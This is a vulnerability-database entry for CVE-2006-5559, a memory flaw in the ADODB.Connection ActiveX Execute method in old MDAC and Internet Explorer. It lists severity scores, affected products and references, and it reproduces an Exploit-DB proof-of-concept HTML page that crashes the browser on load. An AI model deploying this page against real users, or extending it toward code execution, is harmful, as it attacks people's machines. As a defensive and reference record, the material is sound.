CVE-2006-5559 : Detail

CVE-2006-5559

A03-Injection
96.48%V3
Network
2006-10-27
14h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2629

Publication date : 2006-10-23 22h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

<!-- // Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC // tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed // Author: YAG KOHHA (skyhole [at] gmail.com) // Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic // Access violation at: // ---------------------------------------------------- // 77114D0F 66:8B75 00 MOV SI,WORD PTR SS:[EBP] // ---------------------------------------------------- // P.S. It`s will be fast with some shellcode :P --!> <html> <head> <title>ADODB.Connection.Execute CRASH TEST</title> </head> <script> function Bang_Bang() { var a = new ActiveXObject('ADODB.Connection.2.7'); var b = 'FUCK'; while (b.length <= 1024*256) b+=b; for (var i = 0; i < 32768; i++) try { a.Execute(b,b,b); } catch(e) {} } </script> <body onLoad='Bang_Bang()'> <center><h1>WOW!!! Are U live?</h1></center> </body></html> # milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Data_access_components >> Version 2.5

Configuraton 0

Microsoft>>Windows_xp >> Version *

Microsoft>>Data_access_components >> Version 2.8

Configuraton 0

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version itanium

    Microsoft>>Data_access_components >> Version 2.8

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.7

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.8

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.8

    References

    http://securitytracker.com/id?1017127
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.securityfocus.com/bid/20704
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/22452
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.us-cert.gov/cas/techalerts/TA07-044A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.kb.cert.org/vuls/id/589272
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.osvdb.org/31882
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.vupen.com/english/advisories/2007/0578
    Tags : vdb-entry, x_refsource_VUPEN